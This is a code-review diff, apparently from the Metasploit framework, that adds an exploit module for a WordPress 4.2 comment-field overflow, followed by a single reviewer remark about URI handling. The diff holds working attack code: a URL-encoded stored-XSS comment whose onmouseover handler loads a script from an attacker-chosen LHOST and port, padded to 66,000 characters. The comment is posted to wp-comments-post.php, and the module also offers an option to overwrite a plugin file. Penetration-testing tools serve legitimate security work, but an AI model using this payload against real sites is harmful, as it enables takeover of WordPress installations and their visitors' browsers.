modules/exploits/unix/webapp/wp_comment_overflow_exec.rb

```diff
@@ -0,0 +1,143 @@
+            'Author'         =>
+                [
+                    'Jouko Pynnonen', 	  #Initial Proof of Concept
+                    'Matthew Toussain'	  #Everything else
+                ],
+            'References'     =>
+                [
+                    ['URL', 'http://kinozoa.com/blog/wordpress-4-2-comment-field-overflow/'],
+                    ['URL', 'http://klikki.fi/adv/wordpress2.html']
+                ],
+            'Arch'           => ARCH_PHP,
+            'Payload'          =>
+                {
+                    'DisableNops' => true,
+                    'Compat'              =>
+                        {
+                            'ConnectionType' => 'find',
+                        },
+                        # Arbitrary big number. The payload gets sent as an HTTP
+                        # response body, so really it's unlimited
+                        'Space'       => 262144, # 256k
+                },
+            'Platform'       => 'php',
+            'Targets'        =>
+                [
+                    ['Wordpress <= 4.2, 4.1.2, 4.1.1, 3.9.3', {}]
+                ],
+            'Privileged'     => false,
+            'DisclosureDate'  => "Apr 26 2015",
+            'DefaultTarget'  => 0))
+
+        register_options(
+            [
+                OptString.new('PLUGIN',  [true, 'This is the WordPress plugin file that will be written to.','akismet/akismet.php']),
+                OptString.new('COMMENTID',  [true, 'This is id of the WordPress page that will be commented on.','1']),
+                OptString.new('RHOST',  [true, 'This is the WordPress install directory']),
+                OptString.new('LHOST',  [true, 'This is the IP to connect back to for the javascript','0.0.0.0']),
+                OptString.new('URIPATH', [true, 'This is the URI path that will be created for the javascript hosted file','wp-met.js']),
+                OptString.new('SRVPORT', [true, 'This is the port for the javascript to connect back to','80']),
+            ], self.class)
+        end
+
+
+        def exploit
+
+            padding = "A"*66000
+
+            comment = "%3Ca+title%3D%27xxx+onmouseover%3Deval%28unescape%28%2Fvar%2520a%253Ddocument.createElement%2528%2527script%2527%2529%253Ba.setAttribute%2528%2527src%2527%252C%2527http%253A%252f%252f#{datastore['LHOST']}%253A#{datastore['SRVPORT']}%252f#{datastore['URIPATH']}%2527%2529%253Bdocument.head.appendChild%2528a%2529%2F.source%29%29+style%3Dposition%3Aabsolute%3Bleft%3A0%3Btop%3A0%3Bwidth%3A5000px%3Bheight%3A5000px++" + padding + "%27%3E%3C%2Fa%3E"
+
+            comment_post_ID = "#{datastore['COMMENTID']}"
+            cookie = "wp-settings-time-1=1431669695;"
+            post_data = "author=a&email=a%40a.com&url=http%3A%2F%2Fa&comment=" + comment + "&submit=Post+Comment&comment_post_ID=" + comment_post_ID + "&comment_parent=0"
+
+
+            resp = send_request_cgi({
+            'uri'     => "http://#{rhost}/wp-comments-post.php",
```

Comment:
Use the normalize_uri method for generating URI requests. Take a look at https://github.com/rapid7/metasploit-framework/wiki/How-to-Send-an-HTTP-Request-Using-HTTPClient.